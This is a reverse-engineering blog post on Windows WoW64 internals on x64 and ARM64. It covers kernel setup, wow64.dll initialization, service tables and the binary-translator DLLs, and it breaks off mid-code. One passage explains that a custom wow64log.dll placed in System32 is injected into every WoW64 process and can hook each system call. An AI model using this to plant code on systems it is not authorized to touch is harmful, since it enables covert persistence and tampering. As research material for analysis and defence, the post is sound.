WoW64 internals …re-discovering Heaven’s Gate on ARM

( Original text by PetrBenes )

WoW64, aka Windows (32-bit) on Windows (64-bit), is a subsystem that enables 32-bit Windows applications to run on 64-bit Windows. Most people today are familiar with WoW64 on Windows x64, where they can run x86 applications. WoW64 has been with us since Windows XP, and x64 wasn’t the only architecture where WoW64 has been available: it was available on the IA-64 architecture as well, where WoW64 was responsible for emulating x86. More recently, WoW64 has also become available on ARM64, enabling emulation of both x86 and ARM32 applications.

MSDN offers a brief article on WoW64 implementation details. From it we can learn that WoW64 consists of (ignoring IA-64):

  • Translation support DLLs:
    • wow64.dll: translation of Nt* system calls (ntoskrnl.exe / ntdll.dll)
    • wow64win.dll: translation of NtGdi*, NtUser* and other GUI-related system calls (win32k.sys / win32u.dll)
  • Emulation support DLLs:
    • wow64cpu.dll: support for running x86 programs on x64
    • wowarmhw.dll: support for running ARM32 programs on ARM64
    • xtajit.dll: support for running x86 programs on ARM64

Besides Nt* system call translation, the wow64.dll provides the core emulation infrastructure.

If you have previous experience with reversing WoW64 on x64, you may notice that it shares plenty of common code with the WoW64 subsystem on ARM64. Especially if you peeked into WoW64 of recent x64 Windows, you may have noticed that it actually contains strings such as SysArm32 and that some functions check against the IMAGE_FILE_MACHINE_ARMNT (0x1C4) machine type:

[Figure: Wow64SelectSystem32PathInternal found in wow64.dll on Windows x64]
[Figure: Wow64ArchGetSP found in wow64.dll on Windows x64]

WoW64 on x64 systems cannot emulate ARM32, though; it apparently just shares common code. But SysX8664 and SysArm64 sound particularly interesting!

Those similarities can help anyone who is fluent in x86/x64 but not so much in ARM. Also, the Hex-Rays decompiler produces much better output for x86/x64 than for ARM32/ARM64.

Initially, my purpose with this blogpost was to get you familiar with how WoW64 works for ARM32 programs on ARM64. But because WoW64 itself changed a lot with Windows 10, and because WoW64 shares some similarities between x64 and ARM64, I decided to briefly get you through how WoW64 works in general.

Everything presented in this article is based on Windows 10 — insider preview, build 18247.

Terms

Throughout this article I’ll be using some terms I’d like to explain beforehand:

  • ntdll or ntdll.dll: these always refer to the native ntdll.dll (x64 on Windows x64, ARM64 on Windows ARM64, …), unless stated otherwise or unless the context indicates otherwise.
  • ntdll32 or ntdll32.dll: to make an easy distinction between the native and the WoW64 ntdll.dll, any WoW64 ntdll.dll will be referred to with the *32 suffix.
  • emu or emu.dll: these represent any of the emulation support DLLs (one of wow64cpu.dll, wowarmhw.dll, xtajit.dll).
  • module!FunctionName: refers to a symbol FunctionName within the module. If you’re familiar with WinDbg, you’re already familiar with this notation.
  • CHPE: “compiled-hybrid-PE”, a new type of PE file which looks as if it were an x86 PE file, but contains ARM64 code. CHPE will be tackled in more detail in the x86 on ARM64 section.
  • The terms emulation and binary-translation refer to the WoW64 workings and they may be used interchangeably.

Kernel

This section shows some points of interest in ntoskrnl.exe regarding WoW64 initialization. If you’re interested only in the user-mode part of WoW64, you can skip ahead to the Initialization of the WoW64 process section.

Kernel (initialization)

Initialization of WoW64 begins with the initialization of the kernel:

  • nt!KiSystemStartup
  • nt!KiInitializeKernel
  • nt!InitBootProcessor
  • nt!PspInitPhase0
  • nt!Phase1Initialization
    • nt!IoInitSystem
      • nt!IoInitSystemPreDrivers
      • nt!PsLocateSystemDlls

nt!PsLocateSystemDlls routine takes a pointer named nt!PspSystemDlls, and then calls nt!PspLocateSystemDll in a loop. Let’s figure out what’s going on here:

[Figure: PspSystemDlls (x64)]
[Figure: PspSystemDlls (ARM64)]

nt!PspSystemDlls appears to be an array of pointers to some structure, which holds some NTDLL-related data. The order of these NTDLLs corresponds to this enum (included in the PDB):

typedef enum _SYSTEM_DLL_TYPE
{
    PsNativeSystemDll = 0,
    PsWowX86SystemDll = 1,
    PsWowArm32SystemDll = 2,
    PsWowAmd64SystemDll = 3,
    PsWowChpeX86SystemDll = 4,
    PsVsmEnclaveRuntimeDll = 5,
    PsSystemDllTotalTypes = 6,
} SYSTEM_DLL_TYPE;

Remember this enum, we’ll be needing it again in a while.

Now, let’s see what this structure looks like:

[Figure: SystemDllData (x64)]
[Figure: SystemDllData (ARM64)]

The nt!PspLocateSystemDll function initializes the fields of this structure. Unfortunately, the layout of this structure isn’t in the PDB, but you can find a reconstructed version in the appendix.

Now let’s get back to the nt!Phase1Initialization — there’s more:

  • ...
  • nt!Phase1Initialization
    • nt!Phase1InitializationIoReady
      • nt!PspInitPhase2
      • nt!PspInitializeSystemDlls

nt!PspInitializeSystemDlls routine takes a pointer named nt!NtdllExportInformation. Let’s look at it:

[Figure: NtdllExportInformation (x64)]
[Figure: NtdllExportInformation (ARM64)]

It looks like it’s some sort of array, again, ordered by the enum _SYSTEM_DLL_TYPE mentioned earlier. Let’s examine NtdllExports:

[Figure: NtdllExportInformation (x64)]

Nothing unexpected, just tuples of function name and function pointer. Did you notice the difference in the number after the NtdllExports field? On x64 it is 19, while on ARM64 it is 14. This number is the count of items in NtdllExports, and indeed, the two sets differ slightly:

x64                                     ARM64
(0)  LdrInitializeThunk                 (0)  LdrInitializeThunk
(1)  RtlUserThreadStart                 (1)  RtlUserThreadStart
(2)  KiUserExceptionDispatcher          (2)  KiUserExceptionDispatcher
(3)  KiUserApcDispatcher                (3)  KiUserApcDispatcher
(4)  KiUserCallbackDispatcher           (4)  KiUserCallbackDispatcher
-                                       (5)  KiUserCallbackDispatcherReturn
(5)  KiRaiseUserExceptionDispatcher     (6)  KiRaiseUserExceptionDispatcher
(6)  RtlpExecuteUmsThread               -
(7)  RtlpUmsThreadYield                 -
(8)  RtlpUmsExecuteYieldThreadEnd       -
(9)  ExpInterlockedPopEntrySListEnd     (7)  ExpInterlockedPopEntrySListEnd
(10) ExpInterlockedPopEntrySListFault   (8)  ExpInterlockedPopEntrySListFault
(11) ExpInterlockedPopEntrySListResume  (9)  ExpInterlockedPopEntrySListResume
(12) LdrSystemDllInitBlock              (10) LdrSystemDllInitBlock
(13) RtlpFreezeTimeBias                 (11) RtlpFreezeTimeBias
(14) KiUserInvertedFunctionTable        (12) KiUserInvertedFunctionTable
(15) WerReportExceptionWorker           (13) WerReportExceptionWorker
(16) RtlCallEnclaveReturn               -
(17) RtlEnclaveCallDispatch             -
(18) RtlEnclaveCallDispatchReturn       -

We can see that ARM64 is missing Ums (User-Mode Scheduling) and Enclave functions. Also, we can see that ARM64 has one extra function: KiUserCallbackDispatcherReturn.

On the other hand, all NtdllWow*Exports contain the same set of function names:

[Figure: NtdllWowExports (ARM64)]

Notice the names of the second fields of these “structures”: PsWowX86SharedInformation, PsWowChpeX86SharedInformation, … If we look at the addresses of those fields, we can see that they’re part of another array:

[Figure: PsWowX86SharedInformation (ARM64)]

Those addresses are actually the targets of the pointers in the NtdllWow*Exports structures. Also, those function names combined with PsWow*SharedInformation might give you a hint that they’re related to this enum (included in the PDB):

typedef enum _WOW64_SHARED_INFORMATION
{
    SharedNtdll32LdrInitializeThunk = 0,
    SharedNtdll32KiUserExceptionDispatcher = 1,
    SharedNtdll32KiUserApcDispatcher = 2,
    SharedNtdll32KiUserCallbackDispatcher = 3,
    SharedNtdll32RtlUserThreadStart = 4,
    SharedNtdll32pQueryProcessDebugInformationRemote = 5,
    SharedNtdll32BaseAddress = 6,
    SharedNtdll32LdrSystemDllInitBlock = 7,
    SharedNtdll32RtlpFreezeTimeBias = 8,
    Wow64SharedPageEntriesCount = 9,
} WOW64_SHARED_INFORMATION;

Notice how the position of SharedNtdll32BaseAddress correlates with the empty field in the previous screenshot (highlighted). The set of WoW64 NTDLL functions is the same on both x64 and ARM64.

(The C representation of this data can be found in the appendix.)

Now we can tell what the nt!PspInitializeSystemDlls function does: it gets the image base of each NTDLL (nt!PsQuerySystemDllInfo) and resolves all Ntdll*Exports for it (nt!RtlFindExportedRoutineByName). In addition, for WoW64 NTDLLs only (if ((SYSTEM_DLL_TYPE)SystemDllType > PsNativeSystemDll)), it assigns the image base to the SharedNtdll32BaseAddress field of the PsWow*SharedInformation array (nt!PspWow64GetSharedInformation).
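The logic of this routine can be modeled in a few lines of C. This is only a rough sketch, not the kernel's actual code: MOCK_SYSTEM_DLL, mock_initialize_system_dlls and example_usage are hypothetical names, the export resolution is reduced to a comment, and a zero ImageBase is my own stand-in for an NTDLL flavor that was not located on the given system.

```c
#include <assert.h>
#include <stdint.h>

typedef enum _SYSTEM_DLL_TYPE {
    PsNativeSystemDll = 0,
    PsWowX86SystemDll = 1,
    PsWowArm32SystemDll = 2,
    PsWowAmd64SystemDll = 3,
    PsWowChpeX86SystemDll = 4,
    PsVsmEnclaveRuntimeDll = 5,
    PsSystemDllTotalTypes = 6,
} SYSTEM_DLL_TYPE;

/* Only the two WOW64_SHARED_INFORMATION values needed for this sketch. */
enum {
    SharedNtdll32BaseAddress = 6,
    Wow64SharedPageEntriesCount = 9,
};

/* Hypothetical model of one NTDLL flavor and its PsWow*SharedInformation array. */
typedef struct MOCK_SYSTEM_DLL {
    uint64_t ImageBase; /* 0 = flavor not located (assumption of this sketch) */
    uint64_t SharedInformation[Wow64SharedPageEntriesCount];
} MOCK_SYSTEM_DLL;

void mock_initialize_system_dlls(MOCK_SYSTEM_DLL *dlls)
{
    for (int type = PsNativeSystemDll; type < PsSystemDllTotalTypes; type++) {
        if (dlls[type].ImageBase == 0)
            continue;
        /* The kernel would resolve the Ntdll*Exports for this image here. */
        if ((SYSTEM_DLL_TYPE)type > PsNativeSystemDll)
            dlls[type].SharedInformation[SharedNtdll32BaseAddress] = dlls[type].ImageBase;
    }
}

void example_usage(void)
{
    MOCK_SYSTEM_DLL dlls[PsSystemDllTotalTypes] = {0};
    dlls[PsNativeSystemDll].ImageBase = 0x7FF800000000ULL; /* made-up addresses */
    dlls[PsWowX86SystemDll].ImageBase = 0x77000000ULL;
    mock_initialize_system_dlls(dlls);
    /* The native NTDLL gets no shared-information entry, the WoW64 one does. */
    assert(dlls[PsNativeSystemDll].SharedInformation[SharedNtdll32BaseAddress] == 0);
    assert(dlls[PsWowX86SystemDll].SharedInformation[SharedNtdll32BaseAddress] == 0x77000000ULL);
}
```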

Kernel (create process)

Let’s talk briefly about process creation. As you probably already know, the native ntdll.dll is mapped as the first DLL into each created process. This applies to all architectures: x86, x64 and also ARM64. WoW64 processes are no exception to this rule; they share the same initialization code path as native processes.

  • nt!NtCreateUserProcess
  • nt!PspAllocateProcess
    • nt!PspSetupUserProcessAddressSpace
      • nt!PspPrepareSystemDllInitBlock
      • nt!PspWow64SetupUserProcessAddressSpace
  • nt!PspAllocateThread
    • nt!PspWow64InitThread
    • nt!KeInitThread // Entry-point: nt!PspUserThreadStartup
  • nt!PspUserThreadStartup
  • nt!PspInitializeThunkContext
    • nt!KiDispatchException

If you ever wondered how the first user-mode instruction of a newly created process gets executed, now you know the answer: a “synthetic” user-mode exception is dispatched, with ExceptionRecord.ExceptionAddress = &PspLoaderInitRoutine, where PspLoaderInitRoutine points to ntdll!LdrInitializeThunk. This is the first function that is executed in every process, including WoW64 processes.

Initialization of the WoW64 process

The fun part begins!

NOTE: Initialization of wow64.dll is the same on both x64 and ARM64. Any differences will be mentioned.

  • ntdll!LdrInitializeThunk
  • ntdll!LdrpInitialize
  • ntdll!_LdrpInitialize
  • ntdll!LdrpInitializeProcess
  • ntdll!LdrpLoadWow64

The ntdll!LdrpLoadWow64 function is called when the ntdll!UseWOW64 global variable is TRUE, which is set when NtCurrentTeb()->WowTebOffset != NULL.

It constructs the full path to wow64.dll, loads it, and then resolves the following functions:

  • Wow64LdrpInitialize
  • Wow64PrepareForException
  • Wow64ApcRoutine
  • Wow64PrepareForDebuggerAttach
  • Wow64SuspendLocalThread

NOTE: The resolution of these pointers is wrapped in a pair of ntdll!LdrProtectMrdata calls, which unprotect (0) and then re-protect (1) the .mrdata section in which these pointers reside. MRDATA (Mutable Read Only Data) is part of the CFG (Control-Flow Guard) functionality. You can look at Alex’s slides for more information.

When these functions are successfully located, the ntdll.dll finally transfers control to the wow64.dll by calling wow64!Wow64LdrpInitialize. Let’s go through the sequence of calls that eventually bring us to the entry-point of the “emulated” application.

  • wow64!Wow64LdrpInitialize
    • wow64!Wow64InfoPtr = (NtCurrentPeb32() + 1)
    • NtCurrentTeb()->TlsSlots[/* 10 */ WOW64_TLS_WOW64INFO] = wow64!Wow64InfoPtr
    • ntdll!RtlWow64GetCpuAreaInfo
    • wow64!ProcessInit
    • wow64!CpuNotifyMapViewOfSection // Process image
    • wow64!Wow64DetectMachineTypeInternal
    • wow64!Wow64SelectSystem32PathInternal
    • wow64!CpuNotifyMapViewOfSection // 32-bit NTDLL image
    • wow64!ThreadInit
    • wow64!ThunkStartupContext64TO32
    • wow64!Wow64SetupInitialCall
    • wow64!RunCpuSimulation
      • emu!BTCpuSimulate

Wow64InfoPtr is the first variable initialized in wow64.dll. It contains data shared between the 32-bit and 64-bit execution modes. Its structure is not documented, although you can find it partially reconstructed in the appendix.

RtlWow64GetCpuAreaInfo is an internal ntdll.dll function which is called a lot during emulation. It is mainly used for fetching the machine type and architecture-specific CPU context (the CONTEXT structure) of the emulated process. This information is fetched into an undocumented structure, which we’ll be calling WOW64_CPU_AREA_INFO. A pointer to this structure is then passed to the ProcessInit function.

Wow64DetectMachineTypeInternal determines the machine type of the executed process and returns it. Wow64SelectSystem32PathInternal selects the “emulated” System32 directory based on that machine type, e.g. SysWOW64 for x86 processes or SysArm32 for ARM32 processes.
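As a small illustration of that mapping, here is a sketch in C. The function name select_emulated_system32 is made up, and the real Wow64SelectSystem32PathInternal certainly handles more than these two cases (remember the SysX8664 and SysArm64 strings mentioned earlier), so treat it as a simplification.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

#define IMAGE_FILE_MACHINE_I386  0x014C
#define IMAGE_FILE_MACHINE_ARMNT 0x01C4

/* Returns the name of the "emulated" System32 directory for a machine type,
   or NULL for machine types this sketch does not know about. */
const char *select_emulated_system32(unsigned short machine)
{
    switch (machine) {
    case IMAGE_FILE_MACHINE_I386:  return "SysWOW64";
    case IMAGE_FILE_MACHINE_ARMNT: return "SysArm32";
    default:                       return NULL;
    }
}

void example_usage(void)
{
    assert(strcmp(select_emulated_system32(IMAGE_FILE_MACHINE_I386), "SysWOW64") == 0);
    assert(strcmp(select_emulated_system32(IMAGE_FILE_MACHINE_ARMNT), "SysArm32") == 0);
}
```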

You can also notice calls to CpuNotifyMapViewOfSection function. As the name suggests, it is also called on each “emulated” call of NtMapViewOfSection. This function:

  • Checks if the mapped image is executable
  • Checks if following conditions are true:
    • NtHeaders->OptionalHeader.MajorSubsystemVersion == USER_SHARED_DATA.NtMajorVersion
    • NtHeaders->OptionalHeader.MinorSubsystemVersion == USER_SHARED_DATA.NtMinorVersion

If these checks pass, the CpupResolveReverseImports function is called. This function checks whether the mapped image exports the Wow64Transition symbol and, if so, stores in it the 32-bit pointer value returned by emu!BTCpuGetBopCode.

Wow64Transition is mostly known to be exported by SysWOW64\ntdll.dll, but there are actually multiple Windows WoW64 DLLs which export this symbol (they will be mentioned later). You might already be familiar with the term “Heaven’s Gate”: this is where Wow64Transition points to on Windows x64, a simple far jump instruction which switches into a long-mode (64-bit) enabled code segment. On ARM64, Wow64Transition points to a “nop” function.

NOTE: Because there are no checks on the ImageName, the Wow64Transition symbol is resolved for all executable images that pass the checks mentioned earlier. If you’re wondering whether Wow64Transition would be resolved for your custom executable or DLL: it indeed would!

The initialization then continues with thread-specific initialization by calling ThreadInit. This is followed by a pair of calls, ThunkStartupContext64TO32(CpuArea.MachineType, CpuArea.Context, NativeContext) and Wow64SetupInitialCall(&CpuArea). These functions perform the necessary setup of the architecture-specific WoW64 CONTEXT structure to prepare the start of execution in the emulated environment. This is done in exactly the same way as if ntoskrnl.exe itself had started the emulated application, i.e.:

  • setting the instruction pointer to the address of ntdll32!LdrInitializeThunk
  • setting the stack pointer below the WoW64 CONTEXT structure
  • setting the 1st parameter to point to that CONTEXT structure
  • setting the 2nd parameter to point to the base address of the ntdll32

Finally, the RunCpuSimulation function is called. This function just calls BTCpuSimulate from the binary-translator DLL, which contains the actual emulation loop that never returns.

wow64!ProcessInit

  • wow64!Wow64ProtectMrdata // 0
  • wow64!Wow64pLoadLogDll
    • ntdll!LdrLoadDll // "%SystemRoot%\system32\wow64log.dll"

wow64.dll also has its own .mrdata section, and ProcessInit begins by unprotecting it. It then tries to load wow64log.dll from the constructed system directory. Note that this DLL is never present in any released Windows installation (it’s probably used internally by Microsoft for debugging the WoW64 subsystem). Therefore, loading this DLL will normally fail. This isn’t a problem, though, because no critical functionality of the WoW64 subsystem depends on it. If the load did succeed, wow64.dll would try to find the following exported functions there:

  • Wow64LogInitialize
  • Wow64LogSystemService
  • Wow64LogMessageArgList
  • Wow64LogTerminate

If any of these functions were not exported, the DLL would be immediately unloaded.

If we dropped a custom wow64log.dll (which exports the functions mentioned above) into the %SystemRoot%\System32 directory, it would actually get loaded into every WoW64 process. This way we could drop a custom logging DLL, or even inject a native DLL into every WoW64 process!

For more details, you can check my injdrv project which implements injection of native DLLs into WoW64 processes, or check this post by Walied Assar.

Then, certain important values are fetched from the LdrSystemDllInitBlock array. These contain the base address of ntdll32.dll, pointers to functions like ntdll32!KiUserExceptionDispatcher, ntdll32!KiUserApcDispatcher, …, control flow guard information and others.

Finally, Wow64pInitializeFilePathRedirection is called, which, as the name suggests, initializes WoW64 path redirection. The path redirection is implemented entirely in wow64.dll and the mechanism is basically based on string replacement. The path redirection can be disabled and re-enabled by calling the kernel32!Wow64DisableWow64FsRedirection and kernel32!Wow64RevertWow64FsRedirection function pair. Both of these functions internally call ntdll32!RtlWow64EnableFsRedirectionEx, which directly operates on the NtCurrentTeb()->TlsSlots[/* 8 */ WOW64_TLS_FILESYSREDIR] field.
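To give a feeling for what “string replacement” means here, below is a deliberately naive sketch in C. It is not how wow64.dll implements it: the redirect_path function, the hardcoded C:\Windows prefix and the redirection_disabled parameter (standing in for the TLS slot mentioned above) are all my own simplifications, and the real redirector knows about exempted subdirectories and other special cases that are ignored here.

```c
#include <assert.h>
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Case-insensitive prefix test (Windows paths are case-insensitive). */
static int has_prefix_nocase(const char *s, const char *prefix)
{
    while (*prefix) {
        if (tolower((unsigned char)*s) != tolower((unsigned char)*prefix))
            return 0;
        s++;
        prefix++;
    }
    return 1;
}

/* Copies `path` into `out`, replacing a leading System32 directory with SysWOW64
   unless redirection is disabled. Returns 1 on success, 0 if `out` is too small. */
int redirect_path(const char *path, int redirection_disabled, char *out, size_t out_size)
{
    static const char native[] = "C:\\Windows\\System32"; /* hardcoded for the sketch */
    static const char wow[]    = "C:\\Windows\\SysWOW64";
    size_t n = sizeof(native) - 1;
    int written;

    if (!redirection_disabled && has_prefix_nocase(path, native) &&
        (path[n] == '\\' || path[n] == '\0'))
        written = snprintf(out, out_size, "%s%s", wow, path + n);
    else
        written = snprintf(out, out_size, "%s", path);

    return written >= 0 && (size_t)written < out_size;
}

void example_usage(void)
{
    char buf[64];
    assert(redirect_path("C:\\Windows\\System32\\kernel32.dll", 0, buf, sizeof buf));
    assert(strcmp(buf, "C:\\Windows\\SysWOW64\\kernel32.dll") == 0);
}
```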

wow64!ServiceTables

Next, a ServiceTables array is initialized. You might be already familiar with the KSERVICE_TABLE_DESCRIPTOR from the ntoskrnl.exe, which contains — among other things — a pointer to an array of system functions callable from the user-mode. ntoskrnl.exe contains 2 of these tables: one for ntoskrnl.exe itself and one for the win32k.sys, aka the Windows (GUI) subsystem. wow64.dll has 4 of them!

The WOW64_SERVICE_TABLE_DESCRIPTOR has the exact same structure as the KSERVICE_TABLE_DESCRIPTOR, except that it is extended:

typedef struct _WOW64_ERROR_CASE {
    ULONG Case;
    NTSTATUS TransformedStatus;
} WOW64_ERROR_CASE, *PWOW64_ERROR_CASE;

typedef struct _WOW64_SERVICE_TABLE_DESCRIPTOR {
    KSERVICE_TABLE_DESCRIPTOR Descriptor;
    WOW64_ERROR_CASE ErrorCaseDefault;
    PWOW64_ERROR_CASE ErrorCase;
} WOW64_SERVICE_TABLE_DESCRIPTOR, *PWOW64_SERVICE_TABLE_DESCRIPTOR;

(More detailed definition of this structure is in the appendix.)

ServiceTables array is populated as follows:

  • ServiceTables[/* 0 */ WOW64_NTDLL_SERVICE_INDEX] = sdwhnt32
  • ServiceTables[/* 1 */ WOW64_WIN32U_SERVICE_INDEX] = wow64win!sdwhwin32
  • ServiceTables[/* 2 */ WOW64_KERNEL32_SERVICE_INDEX] = wow64win!sdwhcon
  • ServiceTables[/* 3 */ WOW64_USER32_SERVICE_INDEX] = sdwhbase

NOTE: wow64.dll directly depends (by import table) on two DLLs: the native ntdll.dll and wow64win.dll. This means that wow64win.dll is loaded even into “non-Windows-subsystem” processes, that wouldn’t normally load user32.dll.

These two symbols mentioned above are the only symbols that wow64.dll requires wow64win.dll to export.

Let’s have a look at sdwhnt32 service table:

[Figure: sdwhnt32 (x64)]
[Figure: sdwhnt32JumpTable (x64)]
[Figure: sdwhnt32Number (x64)]

There is nothing surprising for those who have already dealt with service tables in ntoskrnl.exe. sdwhnt32JumpTable contains an array of the system call functions, which are traditionally prefixed. WoW64 “system calls” are prefixed with wh*, and I honestly have no idea what it stands for. It might be the same case as with the Zw* prefix: it stands for nothing and is simply used as a unique distinguisher.

The job of these wh* functions is to correctly convert any arguments and return values between the 32-bit version and the native, 64-bit version. Keep in mind that this includes not only conversion of integers and pointers, but also the contents of structures. An interesting note is that each of the wh* functions has only one argument, which is a pointer to an array of 32-bit values. This array contains the parameters passed to the 32-bit system call.
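To illustrate what “converting the contents of structures” involves, here is a minimal sketch in C using UNICODE_STRING, whose layout differs between 32-bit and 64-bit code only in the width of the Buffer pointer. The UNICODE_STRING32/UNICODE_STRING64 type names and the thunk_unicode_string helper are written for this example and are not taken from wow64.dll.

```c
#include <assert.h>
#include <stdint.h>

/* UNICODE_STRING as seen by 32-bit code. */
typedef struct UNICODE_STRING32 {
    uint16_t Length;
    uint16_t MaximumLength;
    uint32_t Buffer;        /* 32-bit pointer */
} UNICODE_STRING32;

/* UNICODE_STRING as seen by 64-bit code. */
typedef struct UNICODE_STRING64 {
    uint16_t Length;
    uint16_t MaximumLength;
    uint64_t Buffer;        /* 64-bit pointer, preceded by alignment padding */
} UNICODE_STRING64;

/* Field-by-field conversion; a plain memcpy would not work because
   the two layouts have different sizes and offsets. */
void thunk_unicode_string(const UNICODE_STRING32 *in, UNICODE_STRING64 *out)
{
    out->Length = in->Length;
    out->MaximumLength = in->MaximumLength;
    out->Buffer = (uint64_t)in->Buffer; /* pointers are zero-extended */
}

void example_usage(void)
{
    UNICODE_STRING32 s32 = { 10, 12, 0x80001000u }; /* made-up values */
    UNICODE_STRING64 s64;
    thunk_unicode_string(&s32, &s64);
    assert(s64.Length == 10 && s64.MaximumLength == 12);
    assert(s64.Buffer == 0x80001000ULL);
}
```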

As you could notice, in those 4 service tables there are “system calls” that are not present in the ntoskrnl.exe. Also, I mentioned earlier that the Wow64Transition is resolved in multiple DLLs. Currently, these DLLs export this symbol:

  • ntdll.dll
  • win32u.dll
  • kernel32.dll and kernelbase.dll
  • user32.dll

The ntdll.dll and win32u.dll are obvious and they represent the same thing as their native counterparts. The service tables used by kernel32.dll and user32.dll contain functions for transformation of particular csrss.exe calls into their 64-bit version.

It’s also worth noting that at the end of the ntdll.dll system table, there are several NtWow64* functions, such as NtWow64ReadVirtualMemory64, NtWow64WriteVirtualMemory64 and others. These are special functions which are provided only to WoW64 processes.

One of these special functions is NtWow64CallFunction64. It has its own small dispatch table, and callers can select which function should be called based on its index:

[Figure: Wow64FunctionDispatch64 (x64)]

NOTE: I’ll be talking about one of these functions — namely Wow64CallFunctionTurboThunkControl — later in the Disabling Turbo thunks section.

wow64!Wow64SystemServiceEx

This function is similar to the kernel’s nt!KiSystemCall64 — it does the dispatching of the system call. This function is exported by the wow64.dll and imported by the emulation DLLs. Wow64SystemServiceEx accepts 2 arguments:

  • The system call number
  • Pointer to an array of 32-bit arguments passed to the system call (as mentioned earlier)

The system call number isn’t just an index, but also contains index of a system table which needs to be selected (this is also true for ntoskrnl.exe):

typedef struct _WOW64_SYSTEM_SERVICE
{
    USHORT SystemCallNumber : 12;
    USHORT ServiceTableIndex : 4;
} WOW64_SYSTEM_SERVICE, *PWOW64_SYSTEM_SERVICE;

This function then selects ServiceTables[ServiceTableIndex] and calls the appropriate wh* function based on the SystemCallNumber.
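The dispatching described above boils down to two bit-field extractions and an indexed call. The following C sketch shows the idea with a mock table; everything prefixed with mock_ or MOCK_, as well as the two toy wh* functions, is invented for illustration, and returning STATUS_INVALID_SYSTEM_SERVICE for out-of-range numbers is an assumption on my part rather than something verified in wow64.dll.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

typedef int32_t (*WH_SERVICE)(const uint32_t *args32);

typedef struct MOCK_SERVICE_TABLE {
    const WH_SERVICE *Base; /* array of wh* functions */
    uint32_t Limit;         /* number of entries in Base */
} MOCK_SERVICE_TABLE;

/* Value of STATUS_INVALID_SYSTEM_SERVICE. */
#define MOCK_STATUS_INVALID_SYSTEM_SERVICE ((int32_t)0xC000001C)

/* Two toy "wh*" functions operating on the 32-bit argument array. */
static int32_t whFirst(const uint32_t *a)  { return (int32_t)a[0]; }
static int32_t whSecond(const uint32_t *a) { return (int32_t)(a[0] + a[1]); }

static const WH_SERVICE mock_nt_table[] = { whFirst, whSecond };

static const MOCK_SERVICE_TABLE ServiceTables[4] = {
    { mock_nt_table, 2 }, { NULL, 0 }, { NULL, 0 }, { NULL, 0 },
};

int32_t mock_system_service(uint32_t service, const uint32_t *args32)
{
    uint32_t number = service & 0xFFF;       /* SystemCallNumber : 12 */
    uint32_t table  = (service >> 12) & 0xF; /* ServiceTableIndex : 4 */

    if (table >= 4 || number >= ServiceTables[table].Limit)
        return MOCK_STATUS_INVALID_SYSTEM_SERVICE;
    return ServiceTables[table].Base[number](args32);
}

void example_usage(void)
{
    uint32_t args[2] = { 40, 2 };
    assert(mock_system_service(0x0001, args) == 42); /* table 0, call 1 */
}
```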

[Figure: Wow64SystemServiceEx (x64)]

NOTE: If wow64log.dll has been successfully loaded, the Wow64SystemServiceEx function calls Wow64LogSystemServiceWrapper (a wrapper around the wow64log!Wow64LogSystemService function) twice: once before the actual system call and once immediately after it. This can be used for instrumentation of each WoW64 system call! The structure passed to Wow64LogSystemService contains all the important information about the system call: its table index, the system call number, the argument list and, on the second call, even the resulting NTSTATUS! You can find the layout of this structure in the appendix (WOW64_LOG_SERVICE).

Finally, as has been mentioned, the WOW64_SERVICE_TABLE_DESCRIPTOR structure differs from KSERVICE_TABLE_DESCRIPTOR in that it contains an ErrorCase table. The code mentioned above is actually wrapped in a SEH __try/__except block. If the whService function raises an exception, the __except block calls the Wow64HandleSystemServiceError function. This function checks whether the service table which raised the exception has a non-NULL ErrorCase and, if it does, selects the appropriate WOW64_ERROR_CASE for the system call. If ErrorCase is NULL, the values from ErrorCaseDefault are used. The NTSTATUS of the exception is then transformed according to an algorithm which can be found in the appendix.

wow64!ProcessInit (cont.)

  • ...
  • wow64!CpuLoadBinaryTranslator // MachineType
    • wow64!CpuGetBinaryTranslatorPath // MachineType
      • ntdll!NtOpenKey // "\Registry\Machine\Software\Microsoft\Wow64\"
      • ntdll!NtQueryValueKey // "arm" / "x86"
      • ntdll!RtlGetNtSystemRoot // "arm" / "x86"
      • ntdll!RtlUnicodeStringPrintf // "%ws\system32\%ws"

As you’ve probably guessed, this function constructs path to the binary-translator DLL, which is — on x64 — known as wow64cpu.dll. This DLL will be responsible for the actual low-level emulation.

[Figure: \Registry\Machine\Software\Microsoft\Wow64\x86 (x64)]
[Figure: \Registry\Machine\Software\Microsoft\Wow64\arm (ARM64)]
[Figure: \Registry\Machine\Software\Microsoft\Wow64\x86 (ARM64)]

We can see that there is no wow64cpu.dll on ARM64. Instead, there is xtajit.dll used for x86 emulation and wowarmhw.dll used for ARM32 emulation.

NOTE: The CpuGetBinaryTranslatorPath function is same on both x64 and ARM64 except for one peculiar difference: on Windows x64, if the \Registry\Machine\Software\Microsoft\Wow64\x86 key cannot be opened (is missing/was deleted), the function contains a fallback to load wow64cpu.dll. On Windows ARM64, though, it doesn’t have such fallback and if the registry key is missing, the function fails and the WoW64 process is terminated.

wow64.dll then loads the selected DLL and tries to find the following exported functions in it:

BTCpuProcessInit (!) BTCpuProcessTerm
BTCpuThreadInit BTCpuThreadTerm
BTCpuSimulate (!) BTCpuResetFloatingPoint
BTCpuResetToConsistentState BTCpuNotifyDllLoad
BTCpuNotifyDllUnload BTCpuPrepareForDebuggerAttach
BTCpuNotifyBeforeFork BTCpuNotifyAfterFork
BTCpuNotifyAffinityChange BTCpuSuspendLocalThread
BTCpuIsProcessorFeaturePresent BTCpuGetBopCode (!)
BTCpuGetContext BTCpuSetContext
BTCpuTurboThunkControl BTCpuNotifyMemoryAlloc
BTCpuNotifyMemoryFree BTCpuNotifyMemoryProtect
BTCpuFlushInstructionCache2 BTCpuNotifyMapViewOfSection
BTCpuNotifyUnmapViewOfSection BTCpuUpdateProcessorInformation
BTCpuNotifyReadFile BTCpuCfgDispatchControl
BTCpuUseChpeFile BTCpuOptimizeChpeImportThunks
BTCpuNotifyProcessExecuteFlagsChange BTCpuProcessDebugEvent
BTCpuFlushInstructionCacheHeavy

Interestingly, not all functions need to be found: only those marked with “(!)” are required, the rest are optional. As a next step, the resolved BTCpuProcessInit function is called, which performs binary-translator-specific process initialization. We’ll cover that in a later section.
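The “required versus optional” resolution can be sketched as a table-driven loop in C. The BT_EXPORT structure, the resolve_translator_exports function and the two mock lookup callbacks are hypothetical; in the real wow64.dll the lookup goes through the loader, which is replaced by a callback here so that the sketch stays self-contained.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

typedef void (*BT_PROC)(void);

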